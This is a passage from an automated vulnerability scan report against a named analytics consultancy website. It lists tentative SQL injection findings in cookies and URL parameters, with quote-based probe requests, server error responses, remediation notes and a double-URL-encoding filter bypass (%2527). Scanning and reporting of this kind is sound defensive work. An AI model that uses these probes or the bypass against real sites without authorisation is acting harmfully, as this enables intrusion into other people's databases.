HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:56:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0''; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:56:45 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.49. http://www.analyticspros.com/blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:48:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:48:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:48:17 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:48:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37445


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.50. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html [1ee73a388da0bb7ec3d7afe3beccac53 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The 1ee73a388da0bb7ec3d7afe3beccac53 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 1ee73a388da0bb7ec3d7afe3beccac53 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00'; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00''; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:52:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.51. http://www.analyticspros.com/blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0%2527; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/95-more-dimensions-site-search-source-medium.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0%2527%2527; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:59:37 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:59:39 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:59:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22780


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.52. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:58:32 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html%2527%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:58:33 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.53. http://www.analyticspros.com/blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html?1'=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/97-workshop-january-29th-dimensionator.html?1''=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:54:10 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:54:13 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:54:13 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21379


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.54. http://www.analyticspros.com/blog/56-seo/59-search-ranking-position-with-ga.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/56-seo/59-search-ranking-position-with-ga.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/56-seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:31:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/56-seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527%2527;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:31:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:31:43 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:31:43 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 27790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.55. http://www.analyticspros.com/blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the d4dad6935f632ac35975e3001dc7bbe8 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:18:31 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/56-seo/78-best-seo-video-matt-cutts-wordpress.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=25
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

